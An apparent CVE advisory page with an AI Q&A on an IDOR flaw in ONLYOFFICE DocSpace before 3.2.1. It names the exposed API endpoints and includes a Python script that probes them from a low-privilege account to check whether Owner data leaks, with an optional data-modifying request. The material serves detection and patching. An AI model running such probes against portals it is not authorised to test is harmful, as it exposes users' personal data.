CVE-2026-38587
IDOR Vulnerability in ONLYOFFICE DocSpace Exposes Sensitive Data
Publication date: 2026-05-26
Last updated on: 2026-05-26
Assigner: MITRE
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| onlyoffice | docspace | before 3.2.1 (3.2.1 itself not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN | |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-38587 is an Insecure Direct Object Reference (IDOR) vulnerability in ONLYOFFICE DocSpace before version 3.2.1. Several REST API endpoints do not check that the caller is entitled to the object named in the URL, so authenticated accounts in the low-privilege User or Guest roles can read information that should be restricted to administrators.
- A User or Guest can retrieve the portal Owner's unique identifier (ID) via GET /api/2.0/settings/security/administrator/:productid.
- With that ID, the same caller can read the Owner's profile via GET /api/2.0/portal/users/:userID.
- The PUT /api/2.0/people/:userid/contacts method was likewise reachable by callers who should not have been allowed to use it.
The combined effect is that low-privilege accounts can view confidential user data, which weakens the security of the DocSpace deployment.
How can this vulnerability impact me?
Any account in the User or Guest role on an affected portal can read Owner-level information, including the Owner's unique identifier and profile details, that should be visible only to administrators. Because a Guest is the least trusted role DocSpace offers, the bar for exploitation is low.
Exposure of that data is a privacy breach in itself, and knowing exactly which account owns the portal gives an attacker a well-chosen target for follow-on attacks such as phishing or credential abuse against the Owner.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The most reliable check is to test the behaviour directly: authenticate to the portal as an account in the User or Guest role and see whether the endpoints below return Owner data instead of an authorization error (HTTP 401/403).
- Request GET /api/2.0/settings/security/administrator/:productid and check whether the Owner's unique identifier is returned.
- Request GET /api/2.0/portal/users/:userID with the Owner's ID and check whether the profile is returned.
- Check whether PUT /api/2.0/people/:userid/contacts accepts the request from the low-privilege account. This call modifies data, so point it at a throwaway test user, never at the real Owner.
Run the requests with curl or Postman while authenticated as that low-privilege account; a 200 response carrying the Owner's data means the instance is affected. As a quicker first pass, compare the installed DocSpace version against 3.2.1, since every earlier release is in the affected range.
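The same procedure scripted, as an added example written for this page rather than code from ONLYOFFICE. It assumes an API token for a User or Guest account obtained out of band and sent as the raw value of the Authorization header, and that successful DocSpace API responses are JSON with the payload under a "response" key; the product ID, owner ID, endpoint body shape for the PUT, and the sample responses used for the offline demo are all constructed for illustration and should be replaced with values from your own portal.

```python
"""Probe the three endpoints named in CVE-2026-38587 from a low-privilege DocSpace session.

Added example for this page, not ONLYOFFICE code. Assumptions (verify on your instance):
the token is passed as the raw Authorization header value, and successful API replies
are JSON with the payload under "response".
"""
import json
import sys
import urllib.error
import urllib.request

# Constructed sample replies, used only for the offline demo below.
SAMPLE_FIXED = (403, '{"error": "Forbidden"}')
SAMPLE_VULNERABLE = (200, '{"response": {"id": "a1b2c3", "email": "owner@example.test"}, "status": 0}')


def build_probes(base_url, product_id, owner_id):
    """Return the (method, url) pairs for the three endpoints in the advisory."""
    base = base_url.rstrip("/")
    return [
        ("GET", f"{base}/api/2.0/settings/security/administrator/{product_id}"),
        ("GET", f"{base}/api/2.0/portal/users/{owner_id}"),
        ("PUT", f"{base}/api/2.0/people/{owner_id}/contacts"),
    ]


def classify(status, body):
    """Map an HTTP status and body to a verdict.

    'denied'       -> server refused the low-privilege caller (expected on fixed builds)
    'exposed'      -> 200 with a non-empty JSON payload (the IDOR is reachable)
    'inconclusive' -> anything else (bad token, wrong id, HTML login page, server error)
    """
    if status in (401, 403):
        return "denied"
    if status != 200:
        return "inconclusive"
    try:
        data = json.loads(body)
    except ValueError:
        return "inconclusive"
    payload = data.get("response") if isinstance(data, dict) else data
    return "exposed" if payload else "inconclusive"


def send(method, url, token, body=None):
    """Issue one request and return (status, body_text) without raising on 4xx/5xx."""
    headers = {"Authorization": token, "Accept": "application/json"}
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")
        headers["Content-Type"] = "application/json"
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace")


def run(base_url, token, product_id, owner_id, allow_write=False):
    """Probe every endpoint; the mutating PUT is skipped unless allow_write is set."""
    results = {}
    for method, url in build_probes(base_url, product_id, owner_id):
        if method == "PUT" and not allow_write:
            results[url] = "skipped (pass --write, and only against a throwaway test user)"
            continue
        # Body shape for the contacts update is an assumption about the DocSpace API.
        body = {"contacts": []} if method == "PUT" else None
        status, text = send(method, url, token, body)
        results[url] = f"{classify(status, text)} (HTTP {status})"
    return results


if __name__ == "__main__":
    if len(sys.argv) < 5:
        # No portal given: show how the verdicts look on the constructed samples.
        for label, (status, body) in (("fixed", SAMPLE_FIXED), ("vulnerable", SAMPLE_VULNERABLE)):
            print(f"{label:<11} -> {classify(status, body)}")
        print("usage: probe.py BASE_URL LOW_PRIV_TOKEN PRODUCT_ID OWNER_USER_ID [--write]")
    else:
        verdicts = run(*sys.argv[1:5], allow_write="--write" in sys.argv[5:])
        for url, verdict in verdicts.items():
            print(f"{verdict:<45} {url}")
```

A "denied" verdict on both GET probes is what a patched 3.2.1 portal should produce; "exposed" on either one means the low-privilege account can read Owner data. Treat "inconclusive" as a test-setup problem (expired token, wrong IDs, a redirect to the login page) rather than a clean result.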
What immediate steps should I take to mitigate this vulnerability?
Upgrade ONLYOFFICE DocSpace to version 3.2.1 or later, the release in which the access checks on these endpoints were fixed. After upgrading, repeat the low-privilege checks above to confirm the endpoints now reject User and Guest accounts.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability lets authenticated low-privilege users read the Owner's unique identifier and profile information, data that should be restricted to administrators.
A user's identifier and profile details are personal data, so exposing them to accounts that have no business need for them can put a deployment out of step with regulations such as GDPR and HIPAA, which require strict, role-appropriate controls over access to personal and sensitive information.
An IDOR of this kind is a failure of access control and of data minimization: the application hands out more personal data than the requesting role is entitled to, which is exactly what these standards require organizations to prevent and, where it occurs, to assess and document.